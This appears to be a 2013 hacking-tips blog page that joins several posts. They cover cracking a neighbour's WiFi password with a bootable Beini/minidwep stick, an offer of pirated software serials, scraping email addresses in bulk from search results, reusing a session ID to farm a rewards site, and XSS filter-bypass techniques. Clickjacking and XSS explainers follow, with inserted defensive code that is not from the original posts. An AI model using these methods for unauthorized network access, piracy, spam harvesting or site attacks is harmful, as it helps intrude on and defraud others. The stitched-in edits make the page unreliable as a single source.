The content in this blog is for educational purposes only. We are not responsible for anything.


Friday, July 19, 2013

Easy Way to H@ck WiFi Password 100%



If you live near someone's WiFi hotspot, it shows up every time your laptop searches for a connection, but you don't have the password. Or you just want someone's WPA/WPA2 Wi-Fi key. Don't worry...

In this tutorial I'll show how to crack a WPA/WPA2 Wi-Fi connection from a bootable USB stick.
Things you will need:


1. A USB pen drive

2. The beini.iso file

Download: http://www.mediafire.com/?n1vtzmzhp35vfga (a third-party file host; check the image against a hash from a source you trust before booting a computer from it)
3. UNetbootin, to make your USB drive bootable. [Download for Windows, Linux or Mac]
Steps to follow (WEP):

1. Write beini.iso to your USB stick with UNetbootin. Set everything as in the image below.



2. When it finishes, restart your PC and boot it from the USB stick.

3. If it boots successfully you should see something like this. Click Minidwep-gtk.



4. Click OK



5. The Minidwep-gtk program will open. Click Scan.



6. Select a wireless network from the list (it should have at least one connected client) and click Launch to start the cracking process.



7. This can take a while, depending on how quickly IVs are collected from the victim's connection and on the key length, so be patient.



8. If it finds the key, it should appear like this.



To crack WPA/WPA2, follow the instructions in this image. Note that the IV-collection attack in steps 1 to 8 only works against WEP. For WPA/WPA2 the tool has to capture a client's 4-way handshake and then run a dictionary attack against it, so success depends entirely on how weak the passphrase is; a long random passphrase will not be recovered this way.



Seagate EVault 100 GB FREE BEST CLOUD Storage With Trick






First of all, it is not valid in India.

Please note, but you can use a simple trick.

First create a new account in
(if you already have one, open the above link).
When asked for an email address, give an @india.com ID.
Second, give the location as US
with a valid US zip code (like 92284, 91167, 94532),
then submit.
Now you're done. Enjoy the 100 GB Seagate cloud storage.

Use multiple accounts using MultiFox in Mozilla Firefox

Hi friends,

Today I am going to tell you how to use multiple accounts using Multifox on Firefox.

If you have more than one account on Google, Yahoo, Facebook, Ultoo, Laaptu, Ypox and so on...

Usually you log in to one account, use it, log out and log in to another.

If you are using Firefox, you can use the MultiFox add-on to be logged in to multiple accounts at the same time.

Steps:Use multiple accounts using MultiFox in Mozilla Firefox

  • Use the Firefox browser (currently Multifox is available only for Firefox).
  • Multifox allows simultaneous logins with different user IDs without needing to log off the current one before logging in with a new user name.
  • Click the green Install Extension link on the right side.

Click Allow.

  • Click the Install button when asked.
  • Restart Firefox to finish the installation.
After installing the MultiFox add-on and restarting Firefox, you are ready to use it. If you want to log in to a different account of the same service (for example Google, Yahoo, Ultoo, Laaptu, Ypox and so on), just select File → New Identity Profile as shown,




A new Firefox window will open with a new profile, in which you can log in to another account of the same service. Each profile has its own cookie store, which is what keeps the sessions apart, and is assigned a number that is shown in the location bar. Clicking on the number in the location bar shows an About box for the MultiFox add-on. If Firefox crashes, all the extra profiles generated by Multifox are restored when you restore the original Firefox instance.
  • Click the blue box in the address bar.


  • Finally, all 4 accounts are open in Firefox using Multifox.

1 Million Serial Numbers of Different Softwares

Hi friends, giving you all
1 million serial numbers of different software,
download in a single click.


Gmail DOT Trick : Great Amazing Trick

Suppose there is a Gmail account: Example@gmail.com
with password: abcd

You will get logged in to example@gmail.com if you use
email as : E.xample@gmail.com
password : abcd
email as : Ex.ample@gmail.com
password : abcd
email as : Exa.mple@gmail.com
password : abcd
email as : Exam.ple@gmail.com
password : abcd
email as : Examp.le@gmail.com
password : abcd
and so on..

That means Gmail ignores periods (.) in the address. Isn't that great?

So you can use this trick to register the same mailbox on various GPT, PTC or Twitter accounts: those sites interpret all the above addresses as different, while Gmail delivers them all to the same inbox. The flip side, for anyone running such a site, is that a uniqueness check on the raw address string does not enforce one account per person; the address has to be normalised first.
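What that normalisation looks like, as an added example that is not part of the original post: a function that maps the dot variants above (and the +tag suffix, which Gmail also ignores, plus the googlemail.com alias) to one canonical mailbox, and a duplicate-signup check built on it. The signup list is constructed for the demo.

```javascript
// Added example, not the original post's code. Gmail ignores dots in the local part and
// anything from "+" onward, and googlemail.com is an alias of gmail.com; a site that wants
// one account per mailbox must fold those before checking uniqueness.
const GMAIL_DOMAINS = new Set(['gmail.com', 'googlemail.com']);

function canonicalizeEmail(address) {
  const trimmed = address.trim();
  const at = trimmed.lastIndexOf('@');
  if (at <= 0 || at === trimmed.length - 1) {
    throw new Error(`not an email address: ${address}`);
  }
  let local = trimmed.slice(0, at);
  let domain = trimmed.slice(at + 1).toLowerCase();
  if (GMAIL_DOMAINS.has(domain)) {
    local = local.split('+')[0].replace(/\./g, '');
    domain = 'gmail.com';
  }
  // RFC 5321 allows case-sensitive local parts, but every large provider folds case,
  // and for duplicate detection folding is the safe choice.
  return `${local.toLowerCase()}@${domain}`;
}

// Group a signup list by mailbox; returns [canonical, [raw addresses...]] for every
// mailbox registered more than once. This is the check the GPT/PTC sites in the post lack.
function findDuplicateSignups(addresses) {
  const byMailbox = new Map();
  for (const raw of addresses) {
    const key = canonicalizeEmail(raw);
    if (!byMailbox.has(key)) byMailbox.set(key, []);
    byMailbox.get(key).push(raw);
  }
  return [...byMailbox.entries()].filter(([, raws]) => raws.length > 1);
}

// Constructed signup list: the post's dot variants plus a plus-tag and an unrelated address.
const SIGNUPS = [
  'Example@gmail.com', 'E.xample@gmail.com', 'Exam.ple+ptc@googlemail.com', 'other@example.org',
];
console.log(findDuplicateSignups(SIGNUPS));
```

Addresses at other providers are left as they are apart from case folding, since dot-insensitivity is a Gmail rule, not a general one.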

HOW TO GENERATE THOUSANDS OF GENUINE EMAIL IDS FOR FREE

Hi, here I am once again, with a new trick about how to generate thousands of genuine e-mail IDs within 5 to 10 minutes. All you have to do is follow these simple steps. It is up to you how you use them, so be careful about it.



Requirements:
Mozilla Firefox or Google Chrome browser.
AutoPager plugin. Download it from here: For Mozilla Firefox, For Google Chrome
A bit of brain (very important)

LET'S START GENERATING E-MAIL IDS:
Go to http://www.google.com, click on "Search settings" in the top right corner, change the number of results to display to "100" per page, then click Save preferences.
Now in the search bar type a keyword (or keywords) and the e-mail domain in quotation marks, for example: xyz"@gmail.com". This searches for web pages that contain Gmail addresses and are also related to your keyword. The quotation marks around "@gmail.com" make sure that "@gmail.com" appears on every page in the results.

You can also search a single website for e-mail addresses, as in this example: site:twitter.com "@gmail.com". That search covers the whole of twitter.com for "@gmail.com" addresses.
Now, with your results in focus, click the arrow next to the AutoPager icon as shown in the picture below, then go to "Immediately load > All pages" as shown in the screenshot. With the search results still in focus, scroll all the way down and AutoPager should load the next page of results onto the page you are on. Keep scrolling until all pages have loaded onto the same page.



Press "ctrl + a" to select all of the page, then "ctrl + c" to copy the results. With the results still in the clipboard, go to http://www.skymem.com/ or click here. Paste your results into the first box, which says "1. Put text with email addresses here:", and click the Start Extracting Emails button above that box. The settings should already be correct, with "unique emails" and "sort" ticked, so there is no need to touch those options.
The e-mail addresses should show in the Results box (the 3rd box) almost instantly.
Now copy the results from the results box and paste them into Notepad. Sometimes an e-mail address appears to end in ".com." instead of ".com", so in Notepad go to "Edit > Replace", type ".com." (without the quotation marks) in the "Find what" box and ".com" (again without quotation marks) in the "Replace with" box.


Amulyam all in one sites

Hi friends, I will be updating working sites for Amulyam regularly.
Bookmark this page and visit regularly.



2 july

More sites coming....

Ypox auto earning site

Hi friends, here comes the new Ypox earning site created by SID.
It is working on a new server with full earnings.

Steps to follow:
First bookmark this:
Then log in to your Ypox account
and enter the captcha
and open the bookmark.
After opening it you will get a session ID;
now copy the session ID
and open the site (click to open),
now paste the session ID and mobile recpt no
and click on quiz 1, 2, 3...
Now full earnings in a few minutes.

Thursday, July 18, 2013

IBPS:Institute of Banking Personnel Selection – PO/Mgt Trainee-III CWE 2013 Complete Details:

Institute of Banking Personnel Selection – PO/Mgt Trainee-III CWE 2013 Complete Details: Institute of Banking Personnel Selection (IBPS) is conducting Common Written Examination (CWE PO/MT-III) for the recruitment of Probationary Officer/ Management Trainee vacancies in Public Sector Banks which will be conducted online. Aspirants can apply online from 22-07-2013 to 12-08-2013. More details regarding educational qualifications, age limit, selection and application process are mentioned below…

Participating Banks
Allahabad Bank
Union Bank of India
Central Bank of India
Bank of India
Indian Bank
ECGC
Syndicate Bank
Punjab National Bank
Andhra Bank
United Bank of India
Corporation Bank
Bank of Maharashtra
Indian Overseas Bank
IDBI Bank
UCO Bank
Punjab & Sind Bank
Bank of Baroda
Vijaya Bank
Dena Bank
Canara Bank
Oriental Bank of Commerce
Any other bank or financial institution
IBPS Vacancy Details:
Name of the Post: Probationary Officer/ Management Trainee
Age Limit: Candidates age limit is 20 years to 28 years as on 01-07-2013. Relaxation is applicable as per the rules.
Educational Qualification: Candidates must possess Degree with 60% marks in any discipline from a recognized University or any equivalent qualification recognized as such by the Central Government.
 
Selection Process: Candidates will be selected based on Common Written Exam and Common Interview. Candidates who are Shortlisted in the Examination (CWE) will be called for a Common Interview to be conducted by Participating Organizations and coordinated by IBPS.
Application Fee: Candidates must pay application fee/ intimation charges of Rs.100/- for SC/ ST/ PWD candidates and Rs.600/- for all others through online or offline mode.
Online Mode: After submission of online application form, candidates can make payment through payment gateway using Internet Banking/ Master/ Visa Debit or Credit Cards from 22-07-2013 to 12-08-2013. After online payment, take print of system generated e-receipt for future use.
Offline Mode: Candidates can deposit the fee (offline) by using system generated fee payment challan at CBS branches of any of 7 Public Sector Banks mentioned in the notification from 24-07-2013 to 17-08-2013. Fee payment Challan can be downloaded after submission of online application form.
How to Apply: Interested candidates can apply online through IBPS official website www.ibps.in by filling all the mandatory details from 22-07-2013 to 12-08-2013. After submission of online application form, candidates are required to take print out of it for future use. System generated printout of the online application form, original and self attested photocopies of all relevant documents must be produced at the time of interview.

Instructions to Apply Online:
1. Log on to www.ibps.in
2. Select the link “CWE PO/MT-III” and then click on the option “Click here to Apply Online for CWE-Probationary Officers/ Management Trainees (CWE PO/MT-III)” to open Online Application.
3. Fill all the mandatory details, upload scanned copy of photograph and signature.
4. Submit error free online application.
5. Make payment as mentioned above and update payment details by revisiting the website.
6. Take print out of system generated e-receipt (if online payment made) and online Application Form for future use.
Important Dates:
Starting Date for Online Registration: 22-07-2013
Closing Date for Online Registration: 12-08-2013
Online Payment of Application Fees: 22-07-2013 to 12-08-2013
Offline Payment of Application Fees: 24-07-2013 to 17-08-2013
Download of Call Letter for Pre-Examination Training (PET) for SC/ ST/ Minority Community candidates: After 25-09-2013
Pre-Examination Training: 07-10-2013 to 12-10-2013
Download of Call letter for Examination: After 07-10-2013
Online Examination (Tentative dates) – Some/ All/ Additional Dates as the need arises: 19-10-2013/ 20-10-2013/ 26-10-2013/ 27-10-2013
Declaration of Result Status of Examination (CWE): Third/ Fourth Week of November 2013
Download of Call Letters for Interview: First Week of January 2014
Conduct of Interview: Third Week of January 2014
Allotment: March 2014
For more details regarding age, qualifications, pay scale, selections and other information click on the below links…
IBPS – PO/MT CWE – III (2013) More Information
 PO/MT CWE-III Notification Click here 
 PO/MT CWE-III Eligibility Click here 
PO/MT CWE-III Selection Process Click here 

Wednesday, July 10, 2013

Self-XSS (Cross Site Scripting) ~ Social Engineering Attack and Prevention




Last time, I explained the clickjacking attack and how to prevent it. Today I am going to explain the Self-XSS (Cross Site Scripting) attack.


What is Self-XSS?
Self-XSS is a popular social engineering attack in which the attacker tricks users into pasting malicious code into their own browser. Because the pasted script runs in the context of whatever site the victim has open, it gives the attacker access to that site as the victim. Scammers usually use it to push users into buying products or to make money through online surveys.

Recently, attackers flooded Facebook with explicit hardcore porn images. Facebook said it might have been a Self-XSS attack.

JavaScript can be executed from the browser's URL bar.
For example, enter the following code in your browser:
This will show a pop-up box with "kotharavichandra". An attacker can use the same mechanism for malicious purposes: he can steal confidential data or cookies, redirect you to malware sites and more. (Current browsers strip a leading "javascript:" from text pasted into the address bar, which is why the same scam is now usually aimed at the developer console instead.)
For example:
Entering the following code will display your cookies in the browser:

The above code does nothing malicious beyond displaying the cookies, but an attacker can extend the script so that it sends them to him. Cookies flagged HttpOnly are not readable from script, which is one good reason to set that flag on session cookies.

Security Tips from kotharavichandra:
  • Use the NoScript add-on, which blocks JavaScript from running in your browser.
  • Don't click shortened URLs, for example bit.ly/55ewEb?22. They may redirect to infected sites.
Aware of Social Engineering:
  • If anyone (even a friend) asks you to paste a script into the browser bar, never do it.
  • If anyone says "iPhone only $10", don't rush to click it.
  • If anyone says "1000 shares will cure a baby", never do it. Facebook shares never earn money or cure babies.
  • Read our EHN spam report to know the latest updates about the facebook scams.
God gave us a sixth sense. Use it, and think before you click any link or follow someone else's instructions.

What is Clickjacking Attack? How to Prevent? | UI Redressing




Will answering a simple maths quiz delete your social network account? If your answer is "No", read this news about the LinkedIn clickjacking vulnerability and come back. Will visiting a website turn on your webcam? The answer is "Yes": see this Flash Player clickjacking vulnerability.

If you read the news above completely, it will be easy to understand what clickjacking is. OK, let's continue with our article.

Clickjacking, also known as UI redressing, is a malicious technique that tricks users into clicking a button or image that triggers an action on another site.
An attacker uses multiple transparent or opaque layers to trick a user into clicking a button or link on another page when they intended to click on the innocuous page. The attacker thus hijacks the click and sends it to another website, which is why it is known as clickjacking (click + hijacking). The term "clickjacking" was coined by Jeremiah Grossman and Robert Hansen in 2008.

Example:
Let's take the real-world example of the LinkedIn clickjacking vulnerability.
The image above looks like a simple maths problem. Once you click the submit button, it deletes your LinkedIn account (if you are logged in) without asking any questions.

Clickjacking attacks can be used for:
  • Tricking users into turning on their webcam and microphone via this Adobe vulnerability (the flaw has since been fixed by Adobe)
  • Getting more Twitter followers
  • Posting on your Facebook wall
  • Deleting your profile

Prevention Techniques:

Client side (security tips for users):
Flash Player:
Update your Flash Player (old versions are vulnerable to clickjacking).

Browser security add-ons:
NoScript:
NoScript is a Mozilla add-on that provides protection against clickjacking, XSS and other malicious scripts. NoScript is available for mobiles too.

Comitari Web Protection Suite: Comitari provides client-side protection against clickjacking (aka UI redressing) attacks. Installed as a browser add-on.

GuardedID: a commercial product that provides client-side clickjacking protection for users of IE or Firefox without interfering with the operation of legitimate iframes.

Server side (for developers):
Frame killer:
A framekiller is a JavaScript snippet placed in a web page to stop the page being loaded inside a frame on another site. It provides some protection against frame-based clickjacking, but a script can be neutralised by the framing page (for example with the iframe sandbox attribute), so the control to rely on is the X-Frame-Options response header, or the frame-ancestors directive of Content-Security-Policy, which the browser enforces without depending on any script in the page.
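Both halves of that advice, as an added example that is not the post's code: the classic frame-killer written over a window-like object so it can be exercised outside a browser, and a helper that returns the response headers a server should send. The window objects and origins used are constructed for the demo.

```javascript
// Added example, not the original post's code. `win` is any object with top/self/location,
// which is how the function can be exercised outside a browser; in a page you would call
// frameKiller(window) from an inline script at the top of <head>.
function frameKiller(win) {
  // Not framed: the top-level window is ourselves, nothing to do.
  if (win.top === win.self) return false;
  // Framed: navigate the top-level window to our own URL, busting out of the frame.
  win.top.location = win.self.location;
  return true;
}

// Headers a server should send so the browser refuses to render the page in a frame at all.
// An empty allow-list means nobody may frame the page; 'self' means only the same origin.
function antiFramingHeaders(allowedOrigins = []) {
  if (allowedOrigins.length === 0) {
    return { 'X-Frame-Options': 'DENY', 'Content-Security-Policy': "frame-ancestors 'none'" };
  }
  const sources = allowedOrigins.map(o => (o === 'self' ? "'self'" : o)).join(' ');
  const headers = { 'Content-Security-Policy': `frame-ancestors ${sources}` };
  // X-Frame-Options can only express DENY or SAMEORIGIN (ALLOW-FROM is no longer honoured),
  // so it is emitted only when the allow-list is exactly the page's own origin.
  if (allowedOrigins.length === 1 && allowedOrigins[0] === 'self') {
    headers['X-Frame-Options'] = 'SAMEORIGIN';
  }
  return headers;
}

// Constructed window objects: one loaded inside an attacker's frame, one top-level.
function demo() {
  const attackerTop = { location: 'https://attacker.example/quiz.html' };
  const framed = { top: attackerTop, self: { location: 'https://victim.example/delete' } };
  const busted = frameKiller(framed);
  const standalone = { location: 'https://victim.example/' };
  standalone.top = standalone;
  standalone.self = standalone;
  return { busted, topNowAt: attackerTop.location, untouched: !frameKiller(standalone) };
}

console.log(demo(), antiFramingHeaders(), antiFramingHeaders(['self']));
```

The frame-killer only helps when its script actually runs; a framing page that sets sandbox="allow-scripts" (without allow-top-navigation) lets the script execute but blocks the top.location write, which is exactly why the headers are the primary control.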

Bypassing the XSS Filters : Advanced XSS Tutorials for Web application Pen Testing

Hi friends, last time I explained what XSS is and how an attacker can inject a malicious script into your site. As I promised earlier, I am writing this advanced XSS tutorial for you (more articles will come).

Sometimes website owners use XSS filters (a WAF) to protect against XSS vulnerabilities.
For example, if you put in
, the filter will escape the " (quote) character, so the script becomes

Now this script won't work. Likewise, filters use different filtering methods to give protection against XSS. In these cases we can use some tricks to bypass the filter, and that is what I am going to cover here.

1. Bypassing magic_quotes_gpc

magic_quotes_gpc=ON is a PHP setting (configured in php.ini) that automatically escapes every ' (single quote), " (double quote) and \ (backslash) in request data with a backslash. For example:
will be filtered as
, so the script won't work now.

This is a well-known filtering method, but we can easily bypass it by supplying the string as character codes instead.
For example:

can be converted to

so the script becomes . In this case there is no " (double quote), ' (single quote) or \ (backslash), so the filter has nothing to escape. Yes, the script will run successfully.
String.fromCharCode() is a JavaScript function that converts a list of character codes into a string.

How to convert to character codes?

There are some online sites that convert text to character codes, but I suggest you use the HackBar Mozilla add-on.

After installing the HackBar add-on, press F9. It opens a small box above the URL bar. Click XSS -> String.fromCharCode().

Now a small window will pop up. Enter the code, for instance alert("Hi"), and click OK. Now we have the output.

Copy the code into the inside of the script tag and insert it into the vulnerable site.

For example:


2. HEX encoding

We can hex-encode the whole script so that the filter does not recognise it. This only works where the target decodes the input before using it (for example URL-decoding a query parameter).
For example:
can be converted to hex as:
Now put the code in the request to the vulnerable site.
For example:
Converting to HEX:
This site will convert text to hex: http://centricle.com/tools/ascii-hex/

3. Bypassing with case obfuscation

Some website admins put script and alert on a restricted word list, so whenever you input these keywords the filter removes them and shows an error message like "you are not allowed to search this". A case-sensitive filter can be bypassed by changing the case of the keywords. Note that this only helps for HTML tag and attribute names, which browsers match case-insensitively; JavaScript identifiers such as alert are case-sensitive, so for those use String.fromCharCode() or string concatenation instead.
For example:

This bypass technique rarely works, but it is worth a try.

4. Closing tag

Sometimes putting "> at the beginning of the code will work.


This closes the previously opened tag and opens our script tag.
Example:

Conclusion:
From the above it is clear that XSS filters alone are not going to protect a site from XSS attacks; the fix is to encode output for the context it lands in. If you really want to make your site more secure, ask pentesters to test your application, or test it yourself.

There are many other filter-bypass techniques; I have just covered some useful ones for you.
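The encoders above, as an added example that is not the post's code: String.fromCharCode and hex encoding rebuilt as functions, two naive filters of the kind the post describes (magic_quotes-style quote escaping and a case-sensitive keyword blacklist), and a matrix showing which constructed payloads each filter passes unchanged, beside a proper HTML escape that passes none. The payloads and filters are constructed for the demo.

```javascript
// Added example, not the original post's code: the encoders the post drives through HackBar
// and an online converter, beside two naive filters, to show which payloads each lets through
// and that contextual HTML escaping stops all of them.

// alert("Hi")  ->  String.fromCharCode(97,108,101,114,116,40,34,72,105,34,41)
function toFromCharCode(js) {
  return 'String.fromCharCode(' + Array.from(js, c => c.charCodeAt(0)).join(',') + ')';
}

// Percent-encode every byte; works where the target URL-decodes the parameter before use.
function toHex(s) {
  return Array.from(Buffer.from(s, 'utf8'), b => '%' + b.toString(16).padStart(2, '0')).join('');
}

// Filter 1, magic_quotes_gpc style: backslash before ' " and \.
function magicQuotesFilter(input) {
  return input.replace(/(['"\\])/g, '\\$1');
}

// Filter 2, keyword blacklist: case-sensitive removal of "script" and "alert".
function keywordFilter(input) {
  return input.replace(/script|alert/g, '');
}

// The control the post's conclusion asks for: escape for an HTML text context.
function htmlEscape(s) {
  return s.replace(/[&<>"']/g, c =>
    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]));
}

// A payload gets through a filter if the filter hands it back unchanged.
function passesUnchanged(filter, payload) {
  return filter(payload) === payload;
}

// Constructed payloads. HTML tag names are case-insensitive but JavaScript identifiers are
// not: <ScRiPt> still runs, ALERT() does not, so the case trick goes on the tag and the
// identifier is hidden by string concatenation instead.
const PAYLOADS = {
  plain: '<script>alert("Hi")</script>',
  charCode: '<script>eval(' + toFromCharCode('alert("Hi")') + ')</script>',
  mixedCase: "<ScRiPt>window['al'+'ert']('Hi')</ScRiPt>",
};

// For every payload, which filters pass it unchanged.
function bypassMatrix() {
  const filters = { magicQuotes: magicQuotesFilter, keyword: keywordFilter, htmlEscape };
  const matrix = {};
  for (const [pName, payload] of Object.entries(PAYLOADS)) {
    matrix[pName] = {};
    for (const [fName, filter] of Object.entries(filters)) {
      matrix[pName][fName] = passesUnchanged(filter, payload);
    }
  }
  return matrix;
}

console.log(bypassMatrix());
```

The matrix shows the pattern the post describes: the quote-escaping filter passes the fromCharCode payload (it contains no quotes), the keyword filter passes the mixed-case payload, and the HTML escape passes neither, because it does not look for bad words at all; it makes the angle brackets inert wherever they came from.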

DOM Based Cross Site Scripting(XSS) vulnerability Tutorial


So far I have explained traditional cross-site scripting, which occurs because of insecure server-side code. In this post I am going to explain the DOM-based cross-site scripting vulnerability. If you don't know what cross-site scripting is, I recommend you read the basics here first.

Before explaining DOM-based XSS, let me explain what DOM means.

What is DOM?
DOM stands for Document Object Model. It is the interface that allows client-side scripts (for example JavaScript) to dynamically access and modify the content, structure and style of a web page.

Like server-side scripts, client-side scripts can also accept and manipulate user input with the help of the DOM.

Here is a very simple HTML page that accepts and writes user input using JavaScript with the help of the DOM.


If you know HTML and JavaScript, understanding the above code is a piece of cake.

In the above example, the JavaScript code reads the value of the URL parameter "BTSinput" and writes that value into the web page.

For example, if the URL is
the web page will display "default" as output.


Did you notice? That part of the web page is not written by a server-side script. The client-side script modifies the content dynamically based on the input, all done through the DOM object 'document'.

DOM-based XSS vulnerability:
When a developer writes content through the DOM without sanitising the user input, it allows an attacker to run his own code.

In the above example we failed to sanitise the input and simply displayed whatever value we got from the URL.

An attacker with malicious intent can inject an XSS vector instead. For example:



As I said earlier, the document.write function simply writes the value of the BTSinput parameter into the web page. So it writes
into the web page without sanitising it. This results in the script running and the alert box being displayed.


Patching the DOM-based cross-site scripting vulnerability
Audit all JavaScript code used by your application to make sure that untrusted data is escaped before being written into the document, evaluated, or sent as part of an AJAX request. There are dozens of JavaScript functions and properties which must be protected, including some which are rather non-obvious:

The document.write() function
The document.writeln() function
The eval() function, which executes JavaScript code from a string
The execScript() function, which works similarly to eval()
The setInterval(), setTimeout(), and navigate() functions
The .innerHTML property of a DOM element
Certain CSS properties which allow URLs such as .style, .backgroundImage, .listStyleImage, etc.
The event handler properties like .onClick, which take JavaScript code as their values

Any data derived from data under the client's control (request parameters, headers, query parameters, cookie names and values, the URL of the request itself, etc.) should be escaped before being used. Examples of user-controlled data include document.location (and most of its properties, e.g. document.location.search), document.referrer, cookie names and values, and request header names and values.

For data going into a URL you can use the built-in encodeURIComponent() (there is no built-in encode() function); for data going into the page as text, use an HTML-entity escape or, better, assign it with textContent instead of document.write() or innerHTML. If you write your own escaping functions, be extremely careful. Rather than a "black list" approach (filtering dangerous characters and passing everything else through untouched), it is better to use a "white list" approach. A good white-list approach is to escape everything by default and allow only alphanumeric characters through.

Reference:
http://www.rapid7.com/vulndb/lookup/http-client-side-xss
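A first pass at the audit the previous section asks for, as an added example that is not the post's or Rapid7's code: a lexical scan over JavaScript source text that flags the sinks listed above and marks a line as tainted when it also reads one of the listed sources, with one-hop tracking of variables assigned directly from a source. It is a grep, not a taint analysis: it misses flows through function calls or objects, so treat its output as a list of places to review. The sample source is constructed for the demo, including the post's BTSinput parameter.

```javascript
// Added example, not the original post's code: a lex-level first pass over JavaScript source
// for the sources and sinks listed above. One-hop tracking marks variables assigned directly
// from a source as tainted; flows through calls or object properties are not followed.
const SOURCES = [
  /\blocation\b/, /\bdocument\.URL\b/, /\bdocument\.referrer\b/,
  /\bdocument\.cookie\b/, /\bwindow\.name\b/,
];
const SINKS = [
  /\bdocument\.write(ln)?\s*\(/, /\.innerHTML\s*=/, /\.outerHTML\s*=/,
  /\beval\s*\(/, /\bexecScript\s*\(/, /\bnew\s+Function\s*\(/,
  /\bset(Timeout|Interval)\s*\(\s*["'`]/,   // only the string-argument form executes code
  /\.on[a-z]+\s*=\s*["'`]/,                 // handler assigned as a string of code
];

// Returns one finding per line that uses a sink: { line, sink, tainted, text }.
function auditSource(js) {
  const lines = js.split('\n');
  const taintedNames = new Set();
  for (const line of lines) {
    const decl = line.match(/\b(?:var|let|const)\s+([A-Za-z_$][\w$]*)\s*=/);
    if (decl && SOURCES.some(re => re.test(line))) taintedNames.add(decl[1]);
  }
  const mentionsTaint = line =>
    SOURCES.some(re => re.test(line)) ||
    [...taintedNames].some(name => new RegExp(`\\b${name.replace(/\$/g, '\\$')}\\b`).test(line));
  const findings = [];
  lines.forEach((line, idx) => {
    const sink = SINKS.find(re => re.test(line));
    if (!sink) return;
    findings.push({ line: idx + 1, sink: sink.source, tainted: mentionsTaint(line), text: line.trim() });
  });
  return findings;
}

// Constructed sample, including the post's BTSinput parameter and a safe textContent write.
const SAMPLE_JS = `
var q = location.search.split('BTSinput=')[1];
document.write('Your input: ' + q);
document.getElementById('out').textContent = q;
var tpl = '<b>' + document.referrer + '</b>';
el.innerHTML = tpl;
setTimeout(function () { tick(); }, 1000);
setTimeout("run(" + window.name + ")", 0);
`;

console.log(auditSource(SAMPLE_JS));
```

On the sample it reports three lines (the document.write, the innerHTML assignment and the string-form setTimeout), all tainted, and stays quiet about the textContent assignment and the function-form setTimeout, which is the distinction a reviewer wants the tool to make.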

Cross Site Scripting(XSS) Complete Tutorial for Beginners~ Web Application Vulnerability


 

What is XSS?

Cross-site scripting, also known as XSS, is one of the most common web application vulnerabilities. It allows an attacker to run his own client-side scripts (especially JavaScript) in web pages viewed by other users.

In a typical XSS attack, a hacker injects malicious JavaScript code into a legitimate website. When a user visits the specially crafted link, the malicious JavaScript executes in their browser. A successfully exploited XSS vulnerability allows attackers to carry out phishing attacks, steal accounts, and even build worms.

Example: let us imagine a hacker has discovered an XSS vulnerability in Gmail and injected a malicious script. When a user visits the site, the malicious script executes. The malicious code can be used to redirect users to a fake Gmail page or to capture cookies. Using the stolen cookies, he can log in to your account and change the password.
It will be easy to understand XSS , if you have the following prerequisite:
  • Strong knowledge of HTML and JavaScript (Reference).
  • Basic knowledge of HTTP client-server architecture (Reference).
  • [optional] Basic knowledge of server-side programming (PHP, ASP, JSP).

XSS Attack:
Step 1: Finding a vulnerable website
Hackers use Google dorks to find vulnerable sites, for instance "?search=" or ".php?q=". Elite (1337) hackers target specific sites instead of using Google search. If you are going to test your own site, you have to check every page for the vulnerability.

Step 2: Testing for the vulnerability:
First of all, we have to find an input field into which we can inject our own script, for example a search box, username, password or any other input field.


Test 1:
Once we have found the input field, let us put some string into it, for instance "BTS". It will display the result.

Now right-click on the page and select View Source. Search for the string "BTS" that we entered in the input field, and note where in the page the input is placed.

Test 2:
Now we are going to check whether the server sanitises our input or not. To do this, let us input the .

If a pop-up box with the string 'BTS' appears, we have successfully exploited the XSS. By extending the code with a malicious script, a hacker can steal cookies, deface the site and more.

Types of XSS based on persistence:
Based on persistence, we can categorise XSS attacks into two types, namely persistent and non-persistent.

Persistent XSS:

A persistent or stored XSS attack occurs when malicious code submitted by the attacker is saved by the server in the database and is then served as part of the normal page to everyone who views it.

For example:
Many websites host a support forum where registered users can ask questions by posting messages, which are stored in the database. Let us imagine an attacker posts a message containing malicious JavaScript instead. If the server fails to sanitise the input, the injected script executes whenever a user reads the post. If the injected code steals cookies, it will steal the cookie of every user who reads the post. Using the cookie, the attacker can take control of your account.


Non-Persistent XSS:

Non-persistent XSS, also referred to as reflected XSS, is the most common type of XSS found nowadays. In this type of attack, the injected code is sent to the server in the HTTP request. The server embeds the input in the HTML and returns it (the HTTP response) to the browser. When the browser renders the HTML, it also executes the embedded script. This kind of XSS vulnerability frequently occurs in search fields.

Example:
Let us consider a project-hosting website. To find our favourite project, we type a related word into the search box. When the search finishes, it displays a message like "search results for yourword". If the server fails to sanitise the input properly, the injected script executes.

In a reflected XSS attack, the attacker sends a specially crafted link to victims and tricks them into clicking it. When a user clicks the link, the browser sends the injected code to the server, the server reflects it back in the response, and the browser executes it.

In addition to these types, there is a third type called DOM-based XSS, which I will explain in a later post.

What can an attacker do with this Vulnerability?
  • Stealing the Identity and Confidential Data(credit card details).
  • Bypassing restriction in websites.
  • Session Hijacking(Stealing session)
  • Malware Attack
  • Website Defacement
  • Denial of Service attacks(Dos)
Disclaimer:
This article is intended for educational purpose only.
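The two tests and the two variants described above, as an added example that is not the post's code: a search-results page rendered the vulnerable way (raw concatenation) and the fixed way (HTML-escaped), the same choice applied to stored forum posts, and a probe that automates Test 1 and Test 2 against any renderer using the post's "BTS" marker and script payload. The page templates are constructed for the demo.

```javascript
// Added example, not the original post's code.
function htmlEscape(s) {
  return s.replace(/[&<>"']/g, c =>
    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]));
}

// Two ways of dropping user text into an HTML template: raw (vulnerable) or escaped (fixed).
const insertRaw = s => s;
const insertEscaped = htmlEscape;

// Reflected case: the term comes straight from the request and goes back in the response.
function searchPage(term, insert) {
  return `<h2>Search results for ${insert(term)}</h2>`;
}

// Stored case: the same bug, but the text comes from the database, so every reader is hit.
function forumPage(posts, insert) {
  return '<ul>' + posts.map(p => `<li>${insert(p)}</li>`).join('') + '</ul>';
}

// The post's Test 1 and Test 2 against any renderer: is the marker reflected, and if so,
// does a script tag come back intact (meaning the renderer does not encode output)?
const XSS_PROBE = "<script>alert('BTS')</script>";
function probeReflection(render, marker = 'BTS') {
  const reflected = render(marker).includes(marker);
  const vulnerable = reflected && render(XSS_PROBE).includes(XSS_PROBE);
  return { reflected, vulnerable };
}

console.log(probeReflection(t => searchPage(t, insertRaw)));      // { reflected: true, vulnerable: true }
console.log(probeReflection(t => searchPage(t, insertEscaped)));  // { reflected: true, vulnerable: false }
```

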